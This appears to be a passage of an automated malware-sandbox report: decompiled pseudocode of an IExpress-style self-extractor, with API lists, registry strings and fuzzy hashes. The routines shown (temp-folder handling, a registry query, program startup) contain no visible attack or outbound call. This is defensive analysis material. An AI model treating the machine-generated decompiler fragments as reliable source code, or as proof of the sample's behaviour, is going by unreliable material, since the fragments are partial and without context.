                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                • API String ID: 1082909758-4044985724
                                                                                                                                                                                                                                                • Opcode ID: 37a36d0e9700a4fa759630d87e8ba997358d8a1797f88db28b8970e93a6f2d87
                                                                                                                                                                                                                                                • Instruction ID: ec3e6736655b0144e2677314b3549bb294b08d30b393136aa32251dd60466703
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37a36d0e9700a4fa759630d87e8ba997358d8a1797f88db28b8970e93a6f2d87
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9112B7130052477E330AB36AC49FEF766DDFD2325F200165F646D2191CE788D8386A5
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E00025467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t10;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				signed int _t26;
                                                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                                				CHAR* _t48;
                                                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t10 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				if(__edx == 0) {
                                                                                                                                                                                                                                                					_t48 = 0x291e4;
                                                                                                                                                                                                                                                					_t42 = 0x104;
                                                                                                                                                                                                                                                					E00021680(0x291e4, 0x104);
                                                                                                                                                                                                                                                					L14:
                                                                                                                                                                                                                                                					_t13 = E000258C8(_t48); // executed
                                                                                                                                                                                                                                                					if(_t13 != 0) {
                                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                                						_t42 = _a4;
                                                                                                                                                                                                                                                						if(_a4 == 0) {
                                                                                                                                                                                                                                                							L23:
                                                                                                                                                                                                                                                							 *0x29124 = 0;
                                                                                                                                                                                                                                                							_t14 = 1;
                                                                                                                                                                                                                                                							L24:
                                                                                                                                                                                                                                                							return E00026CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t16 = E0002597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                                						if(_t16 != 0) {
                                                                                                                                                                                                                                                							goto L23;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t61 =  *0x28a20; // 0x0
                                                                                                                                                                                                                                                						if(_t61 != 0) {
                                                                                                                                                                                                                                                							 *0x28a20 = 0;
                                                                                                                                                                                                                                                							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L22:
                                                                                                                                                                                                                                                						_t14 = 0;
                                                                                                                                                                                                                                                						goto L24;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                                						 *0x29124 = E00026285();
                                                                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x28a20 = 1;
                                                                                                                                                                                                                                                					goto L17;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t42 =  &_v268;
                                                                                                                                                                                                                                                				_t20 = E000253A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                                				if(_t20 == 0) {
                                                                                                                                                                                                                                                					goto L22;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t48 = 0x291e4;
                                                                                                                                                                                                                                                				E00021781(0x291e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                                				if(( *0x29a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					_t42 = 0x104;
                                                                                                                                                                                                                                                					E0002658A(_t48, 0x104, 0x21140);
                                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                                				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                                				if(_t26 == 0) {
                                                                                                                                                                                                                                                					_push("i386");
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					E0002658A(_t48, 0x104);
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t28 = _t26 - 1;
                                                                                                                                                                                                                                                				if(_t28 == 0) {
                                                                                                                                                                                                                                                					_push("mips");
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t29 = _t28 - 1;
                                                                                                                                                                                                                                                				if(_t29 == 0) {
                                                                                                                                                                                                                                                					_push("alpha");
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t29 != 1) {
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push("ppc");
                                                                                                                                                                                                                                                				goto L11;
                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                0x0002558d
                                                                                                                                                                                                                                                0x0002559d
                                                                                                                                                                                                                                                0x0002559d
                                                                                                                                                                                                                                                0x00025557
                                                                                                                                                                                                                                                0x0002555e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025560
                                                                                                                                                                                                                                                0x00025566
                                                                                                                                                                                                                                                0x00025569
                                                                                                                                                                                                                                                0x0002556f
                                                                                                                                                                                                                                                0x0002556f
                                                                                                                                                                                                                                                0x00025581
                                                                                                                                                                                                                                                0x00025581
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025581
                                                                                                                                                                                                                                                0x00025545
                                                                                                                                                                                                                                                0x0002557c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002557c
                                                                                                                                                                                                                                                0x00025547
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025547
                                                                                                                                                                                                                                                0x0002548a
                                                                                                                                                                                                                                                0x00025490
                                                                                                                                                                                                                                                0x00025497
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002549d
                                                                                                                                                                                                                                                0x000254ab
                                                                                                                                                                                                                                                0x000254b4
                                                                                                                                                                                                                                                0x000254c0
                                                                                                                                                                                                                                                0x0002550c
                                                                                                                                                                                                                                                0x00025511
                                                                                                                                                                                                                                                0x00025515
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025515
                                                                                                                                                                                                                                                0x000254c9
                                                                                                                                                                                                                                                0x000254d6
                                                                                                                                                                                                                                                0x000254d8
                                                                                                                                                                                                                                                0x000254fe
                                                                                                                                                                                                                                                0x00025503
                                                                                                                                                                                                                                                0x00025507
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025507
                                                                                                                                                                                                                                                0x000254da
                                                                                                                                                                                                                                                0x000254dd
                                                                                                                                                                                                                                                0x000254f7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000254f7
                                                                                                                                                                                                                                                0x000254df
                                                                                                                                                                                                                                                0x000254e2
                                                                                                                                                                                                                                                0x000254f0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000254f0
                                                                                                                                                                                                                                                0x000254e7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000254e9
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000254C9
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002553D
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002556F
                                                                                                                                                                                                                                                  • Part of subcall function 000253A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000253FB
                                                                                                                                                                                                                                                  • Part of subcall function 000253A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025402
                                                                                                                                                                                                                                                  • Part of subcall function 000253A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002541F
                                                                                                                                                                                                                                                  • Part of subcall function 000253A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002542B
                                                                                                                                                                                                                                                  • Part of subcall function 000253A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025434
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                • API String ID: 1979080616-3963195772
                                                                                                                                                                                                                                                • Opcode ID: 2665581c6859991f1e94baef276400e1d817c7f4f3418f52f23cfcf1246e28c4
                                                                                                                                                                                                                                                • Instruction ID: f57f53082bf16304fe318b46ae727a935c331879a62ed01339e022f76111c181
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2665581c6859991f1e94baef276400e1d817c7f4f3418f52f23cfcf1246e28c4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6312970B00E305BDB60AF29BC599BEB7DBAB95302F14412AA905C2585DF74CF42869D
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 563 2256d-2257d 564 22622-22627 call 224e0 563->564 565 22583-22589 563->565 573 22629-2262f 564->573 567 2258b 565->567 568 225e8-22607 RegOpenKeyExA 565->568 572 22591-22595 567->572 567->573 569 225e3-225e6 568->569 570 22609-22620 RegQueryInfoKeyA 568->570 569->573 575 225d1-225dd RegCloseKey 570->575 572->573 574 2259b-225ba RegOpenKeyExA 572->574 574->569 576 225bc-225cb RegQueryValueExA 574->576 575->569 576->575
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E0002256D(signed int __ecx) {
                                                                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				long _t24;
                                                                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                                                                				int _t31;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                                                                				if(_t13 == 0) {
                                                                                                                                                                                                                                                					_t31 = E000224E0(_t26);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t34 = _t13 - 1;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						_v8 = 0;
                                                                                                                                                                                                                                                						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                                							goto L7;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                                                                							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                                							if(_t24 == 0) {
                                                                                                                                                                                                                                                								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                                								L6:
                                                                                                                                                                                                                                                								asm("sbb eax, eax");
                                                                                                                                                                                                                                                								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                                								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                                							_t31 = _v8;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t31;
                                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00024096,00024096,?,00021ED3,00000001,00000000,?,?,00024137,?), ref: 000225B2
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00024096,?,00021ED3,00000001,00000000,?,?,00024137,?,00024096), ref: 000225CB
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,00021ED3,00000001,00000000,?,?,00024137,?,00024096), ref: 000225DD
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00024096,00024096,?,00021ED3,00000001,00000000,?,?,00024137,?), ref: 000225FF
                                                                                                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00024096,00000000,00000000,00000000,00000000,?,00021ED3,00000001,00000000), ref: 0002261A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 000225A8
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 000225F5
                                                                                                                                                                                                                                                • PendingFileRenameOperations, xrefs: 000225C3
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                • Opcode ID: c2f28744ce65f9f3bba11d7ef313d2d7c60c66a34af2c2d1af9daa9e7073f9ac
                                                                                                                                                                                                                                                • Instruction ID: 7b44bb202b44a7b5fafdcb78d2db9a3ea50e69f1294bbc82661f511f95e7eda3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2f28744ce65f9f3bba11d7ef313d2d7c60c66a34af2c2d1af9daa9e7073f9ac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91114235A42238FBAB309BD1AC4DEFF7EBCEF057A1F104155B908A2011DA745E45D6A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                				signed int* _t25;
                                                                                                                                                                                                                                                				signed int _t26;
                                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				signed int _t37;
                                                                                                                                                                                                                                                				signed char _t41;
                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                				signed int _t54;
                                                                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                                                                				signed int _t58;
                                                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				void* _t67;
                                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				E00027155();
                                                                                                                                                                                                                                                				_push(0x58);
                                                                                                                                                                                                                                                				_push(0x272b8);
                                                                                                                                                                                                                                                				E00027208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                                				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                                				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                                				_t53 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                                					if(0 == 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(0 != _t56) {
                                                                                                                                                                                                                                                						Sleep(0x3e8);
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t58 = 1;
                                                                                                                                                                                                                                                						_t53 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                                                					_t67 =  *0x288b0 - _t58; // 0x2
                                                                                                                                                                                                                                                					if(_t67 != 0) {
                                                                                                                                                                                                                                                						__eflags =  *0x288b0; // 0x2
                                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                                							 *0x281e4 = _t58;
                                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							 *0x288b0 = _t58;
                                                                                                                                                                                                                                                							_t37 = E00026C3F(0x210b8, 0x210c4); // executed
                                                                                                                                                                                                                                                							__eflags = _t37;
                                                                                                                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                                                                                                                								goto L13;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                                								_t30 = 0xff;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_push(0x1f);
                                                                                                                                                                                                                                                						L00026FF4();
                                                                                                                                                                                                                                                						L13:
                                                                                                                                                                                                                                                						_t68 =  *0x288b0 - _t58; // 0x2
                                                                                                                                                                                                                                                						if(_t68 == 0) {
                                                                                                                                                                                                                                                							_push(0x210b4);
                                                                                                                                                                                                                                                							_push(0x210ac);
                                                                                                                                                                                                                                                							L00027202();
                                                                                                                                                                                                                                                							 *0x288b0 = 2;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						if(_t53 == 0) {
                                                                                                                                                                                                                                                							 *0x288ac = 0;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t71 =  *0x288b4;
                                                                                                                                                                                                                                                						if( *0x288b4 != 0 && E00027060(_t71, 0x288b4) != 0) {
                                                                                                                                                                                                                                                							_t60 =  *0x288b4; // 0x0
                                                                                                                                                                                                                                                							 *0x2a288(0, 2, 0);
                                                                                                                                                                                                                                                							 *_t60();
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                                                                						_t59 =  *_t25;
                                                                                                                                                                                                                                                						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                                						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                                							_t41 =  *_t59;
                                                                                                                                                                                                                                                							if(_t41 > 0x20) {
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							if(_t41 != 0) {
                                                                                                                                                                                                                                                								if(_t54 != 0) {
                                                                                                                                                                                                                                                									goto L32;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                                										_t59 = _t59 + 1;
                                                                                                                                                                                                                                                										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                                										_t41 =  *_t59;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                                							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                								_t29 = 0xa;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push(_t29);
                                                                                                                                                                                                                                                							_t30 = E00022BFB(0x20000, 0, _t59); // executed
                                                                                                                                                                                                                                                							 *0x281e0 = _t30;
                                                                                                                                                                                                                                                							__eflags =  *0x281f8;
                                                                                                                                                                                                                                                							if( *0x281f8 == 0) {
                                                                                                                                                                                                                                                								exit(_t30); // executed
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags =  *0x281e4;
                                                                                                                                                                                                                                                							if( *0x281e4 == 0) {
                                                                                                                                                                                                                                                								__imp___cexit();
                                                                                                                                                                                                                                                								_t30 =  *0x281e0; // 0x80070002
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                                							goto L40;
                                                                                                                                                                                                                                                							L32:
                                                                                                                                                                                                                                                							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                                							if(_t41 == 0x22) {
                                                                                                                                                                                                                                                								__eflags = _t54;
                                                                                                                                                                                                                                                								_t15 = _t54 == 0;
                                                                                                                                                                                                                                                								__eflags = _t15;
                                                                                                                                                                                                                                                								_t54 = 0 | _t15;
                                                                                                                                                                                                                                                								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                                							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                                							__eflags = _t26;
                                                                                                                                                                                                                                                							if(_t26 != 0) {
                                                                                                                                                                                                                                                								_t59 = _t59 + 1;
                                                                                                                                                                                                                                                								__eflags = _t59;
                                                                                                                                                                                                                                                								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t59 = _t59 + 1;
                                                                                                                                                                                                                                                							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L40:
                                                                                                                                                                                                                                                					return E0002724D(_t30);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t58 = 1;
                                                                                                                                                                                                                                                				__eflags = 1;
                                                                                                                                                                                                                                                				goto L7;
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00027155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00027182
                                                                                                                                                                                                                                                  • Part of subcall function 00027155: GetCurrentProcessId.KERNEL32 ref: 00027191
                                                                                                                                                                                                                                                  • Part of subcall function 00027155: GetCurrentThreadId.KERNEL32 ref: 0002719A
                                                                                                                                                                                                                                                  • Part of subcall function 00027155: GetTickCount.KERNEL32 ref: 000271A3
                                                                                                                                                                                                                                                  • Part of subcall function 00027155: QueryPerformanceCounter.KERNEL32(?), ref: 000271B8
                                                                                                                                                                                                                                                • GetStartupInfoW.KERNEL32(?,000272B8,00000058), ref: 00026A7F
                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 00026AB4
                                                                                                                                                                                                                                                • _amsg_exit.MSVCRT ref: 00026AC9
                                                                                                                                                                                                                                                • _initterm.MSVCRT ref: 00026B1D
                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00026B49
                                                                                                                                                                                                                                                • exit.KERNELBASE ref: 00026BBF
                                                                                                                                                                                                                                                • _ismbblead.MSVCRT ref: 00026BDA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836923961-0
                                                                                                                                                                                                                                                • Opcode ID: a47dd271f5a74e9751732fae02410c059e6c32ddc745ab92564fd71e9d97a3c7
